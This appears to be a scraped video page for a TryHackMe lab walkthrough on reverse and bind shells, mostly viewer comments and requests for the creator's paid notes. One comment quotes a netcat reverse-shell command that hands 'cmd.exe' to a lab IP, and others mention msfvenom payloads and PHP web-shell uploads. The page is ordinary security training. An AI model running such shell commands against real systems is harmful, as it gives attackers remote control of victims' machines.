Reverse and Bind Shells Basics | TryHackMe What the Shell?
In this video walk-through, we covered the different types of bind and reverse shells on Windows and Linux for the purpose of penetration testing training.
************
Receive Cyber Security Field, Certifications Notes and Special Training Videos
/ @motasemhamdan
**************
Room Answers
motasem-notes.net/reverse-and...
Room Link
tryhackme.com/room/introtoshells
*******
Receive Cyber Security Field Notes
/ @motasemhamdan
***********
Patreon
www.patreon.com/motasemhamdan...
Backup channel
/ @hacknotesbackup
My Movie channel:
/ @motasemhamdanhacknotes
------------
Пікірлер: 66
I got stuck at the practice examples on this room 2 days ago and left it unfinished. I couldn’t find an English walkthrough for it but today you’ve saved me. Thank you for all the content you make 🙏🏼
@MotasemHamdan
3 жыл бұрын
Glad I could help!
Thank you for going over this. This room was EXTREMELY long winded for just going over reverse shells (again) despite us seeing them in the path like 2 times already.
Motasem....this was a FANTASTIC video! I learned a lot of new information.Thank you sir!
Thank you so much for your video! It really helped me :D
Great video. Thank you for this!
Thanks, with your help I finally finished this room
Excellent video. Thanks for sharing.
You are doing amazing job keep it up bro
Thank you, really help me grasp the idea
Amazing stuff. Thank you
Thank you Motasem
thank you , for share your acknowledgement, its very helpful
Thank you very much for this video. Fantastic walkthrough. I agree with some of the comments, the room is a little long but so worth going through each one thoroughly and practice. The only was you'll get comfortable with these operations. Subscribed
@MotasemHamdan
4 ай бұрын
Glad it was helpful!
Thank you buddy 😊😊
thank you so much
Hi i was wondering if you could share where you got your notes for commands from i see you using them a lot they are great sorry to be so forward about it. BTW loving your walk throughs keep them coming
@MotasemHamdan
2 жыл бұрын
Hi Scott, Notes are available as part of channel membership. Also it's important to keep in mind that access to notes is provided only online though Google drive since notes are always changing with updates and to protect copy-rights. kzread.info/dron/NSdU_1ehXtGclimTVckHmQ.htmljoin
thanks
C:\Windows\system32>nc 10.10.244.250 4545 -e "cmd.exe" 'nc' is not recognized as an internal or external command, operable program or batch file. Did I miss the part where we're supposed to upload netcat to the Windows machine? Either way, this was very helpful. As a beginner I still get lost in some areas that may seem obvious to someone at even a slightly higher level. It's nice to have walkthroughs that don't gloss over too much or make vague, unintuitive-for-beginners statements.
@b4b4_y4g4
2 жыл бұрын
Hi idk if you figured this out but nc and socat is installed in the original account (administrator) you're probably logged in as the new user you created
@user-eh1vi3jz1c
6 ай бұрын
ty @@b4b4_y4g4
How did you get Netcat on the windows vm ?
thanks . i like ur note library .can u share it
@MotasemHamdan
3 ай бұрын
Thank you too ☺️ Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below kzread.info/dron/NSdU_1ehXtGclimTVckHmQ.htmljoin Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below buymeacoffee.com/notescatalog/extras
How are you able to do netcat on the windows machine???
Hi, great video! Would you mind sharing your notebook with the notes?😅
@MotasemHamdan
2 жыл бұрын
Hello, online access to the notes is part of channel membership kzread.info/dron/NSdU_1ehXtGclimTVckHmQ.htmljoin
can you please provide me your notes , it looks quite organized and to the point. Thank you for your great content.
@MotasemHamdan
2 жыл бұрын
Hello, notes are part of the channel membership
@oasen010
2 жыл бұрын
@@MotasemHamdan thank you🙂
Hey @Motasem Hamdan, How do I gain access to your cybersecurity notes manual that you have in ObsidianMD?
@MotasemHamdan
Жыл бұрын
Hello, cyber security notes can be accessed through channel membership tier 2 kzread.info/dron/NSdU_1ehXtGclimTVckHmQ.htmljoin
I do the same commands in msfvenom but the *.exe do not execute when I paste in Desktop. I had a problem before with an ELF file for Linux because of bad encoding. Does anyone here suspect the msfvenom may compile with bugs?
Hi Motasem. What's that notetaking app you're using? Do you like it?
@MotasemHamdan
2 жыл бұрын
Obsidian and yes its helpful :)
@assassino689
2 жыл бұрын
@@MotasemHamdan can you share you please share your note? looks so helpful!!:))
@MotasemHamdan
2 жыл бұрын
@@assassino689 Hi Andrei, notes are part of the channel membership
@assassino689
2 жыл бұрын
@@MotasemHamdan thanks for your answer, I will have to think about it..
here u used your own machine ip address for xfreerdp ? isnt it supposed to be target machine ip address ?
Sir, I was trying to upload the shell.exe to Windows Box. but once i clicked on uploads/shell.exe it gave me download option, how to upload that exe shell to web app uploads directory and call it from there
@datag1199
4 ай бұрын
I am waaaay late on this but if it helps at all, the file extension should be .php and not .exe. I ran into the same issues, as a Data Engineer, I would with PGP files all the time, so I had my extension set as shell.pgp.
can you share those notes of yours? Also, why can't I run socat in the webshell?
@MotasemHamdan
Жыл бұрын
Hi, Notes are part of channel membership tier 2
msfvenom, after creating the payload, the windows machine says: This app can't run on your pc. Any idea why the file can't run? Its generated from the msfvenom syntax.
@MotasemHamdan
2 жыл бұрын
did you make sure you specified the arch and platform?
@StudiofrogPl
2 жыл бұрын
@@MotasemHamdan after the third time everything works but i have no idea what was wrong :) Motasem can you record the audio a little bit louder? When the commercial starts you can get a heart attack. Anyway, Thank You for sharing your knowledge, I really appreciate it.
Where can i get the notes you are using?
@MotasemHamdan
2 жыл бұрын
Hello, notes are part of channel membership
@kezzle9609
2 жыл бұрын
Google.
Hey Motasem, I need to clear a point if target connect back to an attacker it is a reverse shell. But if an attacker connect to a victim it is bind shell. You mentioned on 18:17 that it is bind shell but it is actually a reverse shell. Let me know if i am wrong somewhere.
@akashpandey6470
2 жыл бұрын
You were executing powershell on linux using bind shell command in socat. Please clear the point this may mis-guide any learner. AAHhan OKK you cleared the point on 19:52. Thank god i was so confused. I was like damn i read something there is totally different here. But yeah this concepts are bit confusing. I understood the concept in a following way. Note : i am just adding points related to shells not for any-other concepts. [ Bind as a victim ] : If a computer is listening as well as executing something then it is Bind Shell. [ Bind as an attacker ] : If a computer is using an IP Address & Port to connect... then it is connecting to a Bind shell. [ Reverse as a Victim ] : If a computer is using an IP Address & Port to connect as well as executes something then it is a Reverse Shell. [ Reverse as an attacker ] : If an attacker is listening on port and not executing anything then it is a Reverse Shell. Motasem & Guys if i am wrong somewhere please let me know i will correct if so that we can learn together.
for me it is not working. Neither the script, nor the first php code. I was using my kali box.
@1995261josh
2 жыл бұрын
check the powershell script and try the same method again.
Hello Bro, first I want to thank you for everything you share with our, can you share with me your note script has all script and command by Gmail or here Thanks
@MotasemHamdan
2 жыл бұрын
Access to the manual can be done through the membership. kzread.info/dron/NSdU_1ehXtGclimTVckHmQ.htmljoin
Yay First
@Abhinav-Bhat
3 жыл бұрын
Thanks For Heart
Hey nan
Hii
Why you start in the middle, does not help to follow along.. bhah and too quite
I feel sorry for your enter key man, chill you just need to tap it